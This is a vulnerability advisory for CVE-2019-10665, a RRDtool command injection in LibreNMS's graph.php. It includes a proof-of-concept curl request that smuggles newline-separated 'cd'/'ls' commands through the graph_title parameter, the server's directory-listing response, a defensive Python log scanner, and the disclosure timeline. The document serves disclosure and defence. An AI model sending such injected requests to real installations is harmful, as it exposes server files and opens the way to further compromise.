LibreNMS RRDtool Injection Vulnerability

15 July 2019

CVE

CVE-2019-10665

CVSS SCORE

9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

XID

XL-19-023

AFFECTED VENDORS

LibreNMS (www.librenms.org)

CREDIT

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY

LibreNMS uses RRDtool to draw graphs; xen1thLabs discovered a way to inject syntax into the RRDtool command stream. There are several ways to exploit this vulnerability, including information disclosure, denial of service and arbitrary file writes. It can be combined with other vulnerabilities identified by xen1thLabs to achieve unauthenticated remote code execution. LibreNMS version 1.50.1 changed the affected code without correctly patching the issue; the follow-up vulnerability is recorded under CVE-2019-12463.

 

TECHNICAL DETAILS

The scripts that handle the graphing options (includes/graphs/common.inc.php and includes/graphs/graphs.inc.php) do not sufficiently validate or encode several fields of user-supplied input. Some parameters are filtered with mysqli_real_escape_string, which only protects against SQL injection; other parameters are not filtered at all. Because RRDtool is driven through a pipe, an attacker can use newline characters in parameters of the html/graph.php script to terminate the intended command and inject additional RRDtool operations or syntax. RRDtool's command syntax is versatile enough that this can be leveraged for a number of attacks, including disclosing directory structure and filenames, reading file content, denial of service, or writing arbitrary files.

 

PROOF OF CONCEPT

The following command and HTTP response show the vulnerability:

$ curl "http://host/graph.php?device=&type=device_ber&from=1&graph_title=1'%0a%0acd+.. %0als%0a'&to=2&width=50&height=300&debug=1"

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)

Date: Thu, 28 Mar 2019 09:27:14 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Set-Cookie: PHPSESSID=barhqud83fsssqfujsttl3a789; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 2037

 

<p>graph /tmp/iLL5TDy2mYT12Vza  --alt-autoscale-max --rigid -E --start 1

 

cd ..

ls

 --end 2 --width 50 --height 300 -c BACK#EEEEEE00 -c SHADEA#EEEEEE00 -c SHADEB#EEEEEE00 -c FONT#000000 -c CANVAS#FFFFFF00 -c GRID#a5a5a5 -c MGRID#FF9999 -c FRAME#5e5e5e -c ARROW#5e5e5e -R normal --font LEGEND:7:DejaVuSansMono --font AXIS:6:DejaVuSansMono --font-render-mode normal HRULE:0#555555 --title='device*ber ' --daemon unix:/var/run/rrdcached/rrdcached.sock</p><p>command returned (OK u:0.00 s:0.00 r:0.00

)</p><pre></pre><p>graph /tmp/iLL5TDy2mYT12Vza  --alt-autoscale-max --rigid -E --start 1

 

cd ..

ls

 --end 2 --width 50 --height 300 -c BACK#EEEEEE00 -c SHADEA#EEEEEE00 -c SHADEB#EEEEEE00 -c FONT#000000 -c CANVAS#FFFFFF00 -c GRID#a5a5a5 -c MGRID#FF9999 -c FRAME#5e5e5e -c ARROW#5e5e5e -R normal --font LEGEND:7:DejaVuSansMono --font AXIS:6:DejaVuSansMono --font-render-mode normal HRULE:0#555555 --title='Def Error' --daemon unix:/var/run/rrdcached/rrdcached.sock</p><p>command returned (RRDtool 1.7.0  Copyright by Tobias Oetiker <tobi@oetiker.ch>

               Compiled Mar  1 2018 09:35:27

 

Usage: rrdtool [options] command command_options

Valid commands: create, update, updatev, graph, graphv,  dump, restore,

                                last, lastupdate, first, info, list, fetch, tune,

                                resize, xport, flushcached

 

Valid remote commands: quit, ls, cd, mkdir, pwd

 

RRDtool is distributed under the Terms of the GNU General

Public License Version 2. (www.gnu.org/copyleft/gpl.html)

 

For more information read the RRD manpages

 

OK u:0.00 s:0.00 r:0.01

OK u:0.00 s:0.00 r:0.01

d test

d .github

d tests

d rrd

d bootstrap

d ..

d scripts

d doc

d licenses

d logs

d contrib

d html

d misc

d resources

d .cache

d .git

d config

d storage

d routes

d sql-schema

d .

d cache

d mibs

d LibreNMS

d database

d .composer

d .gnupg

d includes

d vendor

d app

OK u:0.00 s:0.00 r:0.01

ERROR: unknown function '--end'

)</p><pre></pre><br />Runtime 0.033s<br />MySQL [0/0.00s]: Cell[0/0.00s] Row[0/0.00s] Rows[-4/-0.00s] Column[4/0.00s] Update[0/0.00s] Insert[0/0.00s] Delete[0/0.00s]

 

 

Figure 1 – Disclosing directory structure and files.
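
The condition this proof of concept relies on, a graph.php parameter that decodes to a newline or another control character, can be looked for in web-server access logs. The following Python is an added example written for this page, not code from the xen1thLabs advisory or from LibreNMS; the log lines, the set of parameters treated as numeric and the regular expressions are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed nginx-style access log lines (not taken from the advisory). Line 1
# mirrors the advisory's PoC request with its literal space URL-encoded as %20;
# line 2 is a normal graph request; line 3 carries a carriage return (%0d).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Mar/2019:09:27:14 +0000] "GET /graph.php?device=&type=device_ber&from=1&graph_title=1'%0a%0acd+..%20%0als%0a'&to=2&width=50&height=300&debug=1 HTTP/1.1" 200 2037
10.0.0.6 - - [28/Mar/2019:09:30:01 +0000] "GET /graph.php?device=12&type=device_bits&from=1553764800&to=1553768400&width=500&height=150 HTTP/1.1" 200 8123
10.0.0.7 - - [28/Mar/2019:09:31:44 +0000] "GET /graph.php?device=12&type=device_bits&from=1553764800&to=1553768400&width=500&height=150&graph_title=uplink%0dcd+.. HTTP/1.1" 200 8123
"""

# Request line for graph.php inside the quoted part of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>/graph\.php\?[^ "]*) HTTP/')
# Any C0 control character or DEL; a newline is what lets a value end one rrdtool
# command and start another on the pipe, so none of these belong in a graph parameter.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")
# Parameters the graph scripts hand to rrdtool as numbers (assumed set for this example).
INT_PARAMS = {"from", "to", "width", "height"}


def suspicious_params(url):
    """Return {param: reason} for query values that should never reach rrdtool as-is."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if CONTROL_RE.search(value):
            findings[name] = "control character after URL decoding"
        elif name in INT_PARAMS and not re.fullmatch(r"-?\d+", value):
            findings[name] = "non-integer value"
    return findings


def scan_access_log(text):
    """Return [(line_number, findings)] for graph.php requests with suspicious parameters."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = suspicious_params(match.group("path"))
            if findings:
                hits.append((lineno, findings))
    return hits


if __name__ == "__main__":
    for lineno, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {findings}")
```

The same check, applied server-side before a value is written to the rrdtool pipe, is the input validation the affected scripts lacked; rejecting the request is preferable to stripping the characters.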

AFFECTED SYSTEMS

LibreNMS 1.47 and older

 

SOLUTION

Upgrade to the latest version of LibreNMS

 

DISCLOSURE TIMELINE

26/03/2019 - Contacted LibreNMS developer requesting disclosure coordination

28/03/2019 - Provided vulnerability details

16/04/2019 - Version 1.50.1 released, but did not resolve this issue

01/07/2019 - Version 1.53 released, which patches this issue

15/07/2019 - xen1thLabs public disclosure